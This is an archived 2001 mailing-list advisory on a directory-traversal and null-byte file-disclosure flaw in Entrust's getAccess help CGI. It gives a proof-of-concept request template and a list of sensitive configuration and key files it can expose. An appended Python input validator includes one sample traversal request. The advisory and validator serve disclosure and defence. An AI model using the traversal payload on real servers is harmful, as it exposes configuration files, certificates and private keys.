New getAccess[tm] Vulnerability

From: rudi carell (rudicarellat_private)
Date: Mon Nov 05 2001 - 14:17:14 PST

    Good morning list members,
    
    This is another posting (see the first one here: http://www.securityfocus.com/bid/3109)
    about Entrust's "getAccess[tm]" product.
    
    
    Problem Description:
    
    "getAccess[tm]" (still) uses default shell scripts which start Java classes
    for their web applications.
    
    Due to missing input validation it is possible to read files with getAccess's
    permissions on the "getAccess" machine. (Only works in combination with
    other input fields as described below.)
    In connection with config and other files this can lead to a
    total server compromise (don't ask me how :-).
    
    POC-Example:
    
    An HTTP request to:
    http://getAccessHostname/sek-bin/helpwin.gas.bat?
    
    with the following parameters:
    mode=
    &draw=x
    &file=x
    &module=
    &locale= [relative FILE/PATH] [Nullbyte/0x00] [Backslash/0x5c]
    &chapter=
    
    ... will lead to disclosure of [FILE/PATH]
    
    Config file list (depends heavily on config, and can be found two traversals back
    [../../]):
    
    /config/acl-runtime.conf
    /config/administration.conf
    /config/applist.conf
    /config/authmethod.conf
    /config/clientCert.conf
    /config/connection.conf
    /config/directories.conf
    /config/domainAuth.conf
    /config/hook.conf
    /config/license.conf
    /config/log.conf
    /config/login.conf
    /config/misc.conf
    /config/pmda.conf
    /config/redirection.conf
    /config/registry.conf
    /config/serverCert.conf
    /config/serverConnection.conf
    /config/source_systems.conf
    /config/version.conf
    /config/serverReq.pem
    /config/serverCert.pem
    /config/certs
    
    
    Summary:
    
    object: helpwin.gas.bat (CGI shell scripts)
    
    class: referring to OWASP-IV (Input Validation Classes)
    
    Directory Traversal (IV-DT-1)
    http://www.owasp.org/projects/cov/owasp-iv-dt-1.htm
    Null Character (IV-NC-1)
    http://www.owasp.org/projects/cov/owasp-iv-nc-1.htm
    Meta Character (IV-MC-1)
    http://www.owasp.org/projects/cov/owasp-iv-mc-1.htm
    
    remote: yes
    local: ---
    
    vendor: has been informed with a separate e-mail
    (securityat_private/entrustat_private)
    
    patch/fix: is already available and will be posted by Entrust here today.
    
    recommended fix: sanitize meta-characters from user input
    
    personal remark: using shell scripts for security-related software has
    always been dangerous!!!
    
    
    nice day,
    
    rC
    
    
    
    
    securityat_private
    rudicarellat_private
    http://www.freefly.com/security/
    
    check out the brand new Open Web Application Security Project
    http://www.owasp.org
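The post's recommended fix is to validate user input before the CGI script turns it into a file path. The following is an added defensive example, not code from the post or from Entrust's getAccess product: an allow-list validator for the help-file parameters (`locale`, `chapter`), a classifier that labels a rejected value with the OWASP-IV classes the post cites (IV-DT-1, IV-NC-1, IV-MC-1), and a final check that the resolved file stays under a fixed help directory. The `HELP_ROOT` path, the allowed locale/chapter patterns and the sample request strings are assumptions constructed for the example; the second sample request only follows the parameter shape described in the post.

```python
import os
import re
from urllib.parse import parse_qs, urlsplit

# Assumed directory from which help files may be served (constructed path,
# not taken from the advisory or the product).
HELP_ROOT = "/opt/getaccess/help"

# Allow-list patterns (assumptions): a locale like "en" or "de_DE", and a
# chapter name made of letters, digits, "_" and "-". Anything else is rejected,
# so "..", NUL bytes and shell/path meta-characters can never reach the file system.
LOCALE_RE = re.compile(r"^[a-z]{2}(_[A-Z]{2})?$")
CHAPTER_RE = re.compile(r"^[A-Za-z0-9_-]+$")

# Characters a shell or path resolver would interpret (OWASP IV-MC-1).
META_RE = re.compile(r"[\\/;|&`$<>]")


class RejectedInput(ValueError):
    """Raised when a parameter fails the allow-list; carries the matched classes."""

    def __init__(self, name, value, findings):
        super().__init__(f"{name}={value!r} rejected: {', '.join(findings)}")
        self.findings = findings


def classify(value):
    """Label an already URL-decoded value with the OWASP-IV classes it triggers.

    Used only for logging/detection; the allow-list decides acceptance.
    """
    findings = []
    # Directory traversal (IV-DT-1): a ".." path component, with "\" treated as "/".
    if ".." in value.replace("\\", "/").split("/"):
        findings.append("IV-DT-1")
    # Null character (IV-NC-1): truncates the path in C-based runtimes.
    if "\x00" in value:
        findings.append("IV-NC-1")
    # Meta character (IV-MC-1): separators and shell specials.
    if META_RE.search(value):
        findings.append("IV-MC-1")
    return findings


def validate_param(name, value, pattern):
    """Accept the value only if it fully matches the allow-list pattern."""
    if pattern.fullmatch(value):
        return value
    raise RejectedInput(name, value, classify(value) or ["not in allow-list"])


def resolve_help_file(locale, chapter):
    """Build the help-file path from validated parameters and confirm it stays
    under HELP_ROOT even after symlink/normalisation (defence in depth)."""
    locale = validate_param("locale", locale, LOCALE_RE)
    chapter = validate_param("chapter", chapter, CHAPTER_RE)
    path = os.path.realpath(os.path.join(HELP_ROOT, locale, chapter + ".html"))
    root = os.path.realpath(HELP_ROOT) + os.sep
    if not path.startswith(root):
        raise RejectedInput("path", path, ["IV-DT-1"])
    return path


def check_request(url):
    """Classify one request URL the way a hardened CGI front end would."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    locale = params.get("locale", [""])[0]
    chapter = params.get("chapter", [""])[0]
    try:
        return {"verdict": "allowed", "path": resolve_help_file(locale, chapter), "findings": []}
    except RejectedInput as exc:
        return {"verdict": "blocked", "path": None, "findings": exc.findings}


# Constructed sample requests: a benign one, and one in the shape the post
# describes (relative path, NUL byte, backslash in "locale").
SAMPLE_REQUESTS = [
    "http://getAccessHostname/sek-bin/helpwin.gas.bat?mode=&draw=x&file=x&module=&locale=en&chapter=intro",
    "http://getAccessHostname/sek-bin/helpwin.gas.bat?mode=&draw=x&file=x&module=&locale=../../config/x%00%5c&chapter=",
]

if __name__ == "__main__":
    for url in SAMPLE_REQUESTS:
        result = check_request(url)
        print(result["verdict"], result["findings"] or result["path"])
```

The allow-list does the real work: a locale tag cannot contain a slash, a backslash or a NUL byte, so the traversal, null-character and meta-character cases are all rejected by the same rule, and `classify()` only exists to tell the operator which class was attempted when the rejection is logged. The `realpath` check after joining is a second, independent guard in case a future change loosens the pattern.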
    



    This archive was generated by hypermail 2b30 : Mon Nov 05 2001 - 09:55:31 PST